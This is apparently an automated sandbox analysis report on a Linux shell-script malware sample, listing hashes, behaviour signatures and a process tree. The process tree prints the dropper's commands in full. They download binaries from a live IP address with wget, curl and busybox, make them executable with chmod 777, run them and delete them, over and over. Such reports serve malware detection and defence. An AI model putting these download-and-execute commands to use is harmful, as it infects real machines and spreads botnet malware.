Analysis
-
max time kernel
19s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
21/10/2024, 01:34
Static task
static1
Behavioral task
behavioral1
Sample
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
-
Size
10KB
-
MD5
87159c208c4802b4a091c9afdab0a149
-
SHA1
4a431fedf0d52d9e6f66216d506e9c9c8b992f5c
-
SHA256
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089
-
SHA512
753de5440287c2ca57ed60036c9e630dd86b64c1175e48f95bd64e1d646ed12a86163212d2be91e9c5dd44a440717dd41c11a8fdfd89991d74ba2ff9ac324cf0
-
SSDEEP
192:ETiaS/TRw4sFgAuWD+y+TiaS/TK4sFgAyG:ETiaS/TR9WDv+TiaS/TU
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1659 chmod 1683 chmod 1587 chmod 1653 chmod 1539 chmod 1551 chmod 1599 chmod 1605 chmod 1671 chmod 1527 chmod 1557 chmod 1563 chmod 1611 chmod 1617 chmod 1641 chmod 1521 chmod 1581 chmod 1665 chmod 1533 chmod 1647 chmod 1569 chmod 1677 chmod 1593 chmod 1575 chmod 1623 chmod 1629 chmod 1635 chmod 1545 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl 1522 xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl /tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb 1528 CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb /tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH 1534 M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH /tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI 1540 JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI /tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q 1546 c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q /tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv 1552 bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv /tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K 1558 eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K /tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B 1564 VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg 1570 J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 1576 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 /tmp/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn 1582 uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn /tmp/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr 1588 76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr /tmp/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC 1594 EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC /tmp/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf 1600 3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg 1606 J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 1612 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 /tmp/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn 1618 uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn /tmp/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr 1624 76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr /tmp/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC 1630 EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC /tmp/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf 1636 3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf /tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q 1642 c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q /tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl 1648 xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl /tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb 1654 CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb /tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH 1660 M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH /tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI 1666 JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI /tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv 1672 bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv /tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K 1678 eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K /tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B 1684 VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv curl File opened for modification /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg curl File opened for modification /tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q curl File opened for modification /tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl curl File opened for modification /tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH curl File opened for modification /tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl curl File opened for modification /tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q curl File opened for modification /tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B curl File opened for modification /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg curl File opened for modification /tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb curl File opened for modification /tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv curl File opened for modification /tmp/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr curl File opened for modification /tmp/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC curl File opened for modification /tmp/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf curl File opened for modification /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 curl File opened for modification /tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B curl File opened for modification /tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb curl File opened for modification /tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K curl File opened for modification /tmp/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf curl File opened for modification /tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K curl File opened for modification /tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH curl File opened for modification /tmp/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn curl File opened for modification /tmp/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn curl File opened for modification /tmp/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr curl File opened for modification /tmp/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC curl File opened for modification /tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI curl File opened for modification /tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI curl File opened for modification /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 curl
Processes
-
/tmp/344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh/tmp/344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh1⤵PID:1513
-
/bin/rm/bin/rm bins.sh2⤵PID:1514
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵PID:1515
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- Writes file to tmp directory
PID:1519
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵PID:1520
-
-
/bin/chmodchmod 777 xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- File and Directory Permissions Modification
PID:1521
-
-
/tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl./xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- Executes dropped EXE
PID:1522
-
-
/bin/rmrm xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵PID:1523
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵PID:1524
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- Writes file to tmp directory
PID:1525
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵PID:1526
-
-
/bin/chmodchmod 777 CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- File and Directory Permissions Modification
PID:1527
-
-
/tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb./CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- Executes dropped EXE
PID:1528
-
-
/bin/rmrm CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵PID:1529
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵PID:1530
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- Writes file to tmp directory
PID:1531
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵PID:1532
-
-
/bin/chmodchmod 777 M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- File and Directory Permissions Modification
PID:1533
-
-
/tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH./M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- Executes dropped EXE
PID:1534
-
-
/bin/rmrm M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵PID:1535
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵PID:1536
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- Writes file to tmp directory
PID:1537
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵PID:1538
-
-
/bin/chmodchmod 777 JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI./JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- Executes dropped EXE
PID:1540
-
-
/bin/rmrm JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵PID:1541
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵PID:1542
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- Writes file to tmp directory
PID:1543
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵PID:1544
-
-
/bin/chmodchmod 777 c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- File and Directory Permissions Modification
PID:1545
-
-
/tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q./c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- Executes dropped EXE
PID:1546
-
-
/bin/rmrm c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵PID:1547
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵PID:1548
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- Writes file to tmp directory
PID:1549
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵PID:1550
-
-
/bin/chmodchmod 777 bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- File and Directory Permissions Modification
PID:1551
-
-
/tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv./bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- Executes dropped EXE
PID:1552
-
-
/bin/rmrm bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵PID:1553
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵PID:1554
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- Writes file to tmp directory
PID:1555
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵PID:1556
-
-
/bin/chmodchmod 777 eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- File and Directory Permissions Modification
PID:1557
-
-
/tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K./eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- Executes dropped EXE
PID:1558
-
-
/bin/rmrm eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵PID:1559
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵PID:1560
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- Writes file to tmp directory
PID:1561
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵PID:1562
-
-
/bin/chmodchmod 777 VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- File and Directory Permissions Modification
PID:1563
-
-
/tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B./VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- Executes dropped EXE
PID:1564
-
-
/bin/rmrm VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵PID:1565
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵PID:1566
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- Writes file to tmp directory
PID:1567
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵PID:1568
-
-
/bin/chmodchmod 777 J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg./J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- Executes dropped EXE
PID:1570
-
-
/bin/rmrm J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵PID:1571
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵PID:1572
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- Writes file to tmp directory
PID:1573
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵PID:1574
-
-
/bin/chmodchmod 777 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- File and Directory Permissions Modification
PID:1575
-
-
/tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83./8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- Executes dropped EXE
PID:1576
-
-
/bin/rmrm 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵PID:1577
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵PID:1578
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- Writes file to tmp directory
PID:1579
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵PID:1580
-
-
/bin/chmodchmod 777 uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- File and Directory Permissions Modification
PID:1581
-
-
/tmp/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn./uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- Executes dropped EXE
PID:1582
-
-
/bin/rmrm uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵PID:1583
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵PID:1584
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵
- Writes file to tmp directory
PID:1585
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵PID:1586
-
-
/bin/chmodchmod 777 76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵
- File and Directory Permissions Modification
PID:1587
-
-
/tmp/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr./76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵
- Executes dropped EXE
PID:1588
-
-
/bin/rmrm 76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵PID:1589
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵PID:1590
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵
- Writes file to tmp directory
PID:1591
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵PID:1592
-
-
/bin/chmodchmod 777 EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵
- File and Directory Permissions Modification
PID:1593
-
-
/tmp/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC./EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵
- Executes dropped EXE
PID:1594
-
-
/bin/rmrm EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵PID:1595
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵PID:1596
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵
- Writes file to tmp directory
PID:1597
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵PID:1598
-
-
/bin/chmodchmod 777 3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵
- File and Directory Permissions Modification
PID:1599
-
-
/tmp/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf./3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵
- Executes dropped EXE
PID:1600
-
-
/bin/rmrm 3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵PID:1601
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵PID:1602
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- Writes file to tmp directory
PID:1603
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵PID:1604
-
-
/bin/chmodchmod 777 J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- File and Directory Permissions Modification
PID:1605
-
-
/tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg./J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- Executes dropped EXE
PID:1606
-
-
/bin/rmrm J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵PID:1607
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵PID:1608
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- Writes file to tmp directory
PID:1609
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵PID:1610
-
-
/bin/chmodchmod 777 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- File and Directory Permissions Modification
PID:1611
-
-
/tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83./8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- Executes dropped EXE
PID:1612
-
-
/bin/rmrm 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵PID:1613
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵PID:1614
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- Writes file to tmp directory
PID:1615
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵PID:1616
-
-
/bin/chmodchmod 777 uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- File and Directory Permissions Modification
PID:1617
-
-
/tmp/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn./uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- Executes dropped EXE
PID:1618
-
-
/bin/rmrm uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵PID:1619
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵PID:1620
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵
- Writes file to tmp directory
PID:1621
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵PID:1622
-
-
/bin/chmodchmod 777 76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵
- File and Directory Permissions Modification
PID:1623
-
-
/tmp/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr./76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵
- Executes dropped EXE
PID:1624
-
-
/bin/rmrm 76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵PID:1625
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵PID:1626
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵
- Writes file to tmp directory
PID:1627
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵PID:1628
-
-
/bin/chmodchmod 777 EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵
- File and Directory Permissions Modification
PID:1629
-
-
/tmp/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC./EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵
- Executes dropped EXE
PID:1630
-
-
/bin/rmrm EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵PID:1631
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵PID:1632
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵
- Writes file to tmp directory
PID:1633
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵PID:1634
-
-
/bin/chmodchmod 777 3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵
- File and Directory Permissions Modification
PID:1635
-
-
/tmp/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf./3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵
- Executes dropped EXE
PID:1636
-
-
/bin/rmrm 3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵PID:1637
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵PID:1638
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- Writes file to tmp directory
PID:1639
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵PID:1640
-
-
/bin/chmodchmod 777 c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- File and Directory Permissions Modification
PID:1641
-
-
/tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q./c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- Executes dropped EXE
PID:1642
-
-
/bin/rmrm c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵PID:1643
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵PID:1644
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- Writes file to tmp directory
PID:1645
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵PID:1646
-
-
/bin/chmodchmod 777 xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- File and Directory Permissions Modification
PID:1647
-
-
/tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl./xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- Executes dropped EXE
PID:1648
-
-
/bin/rmrm xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵PID:1649
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵PID:1650
-
-
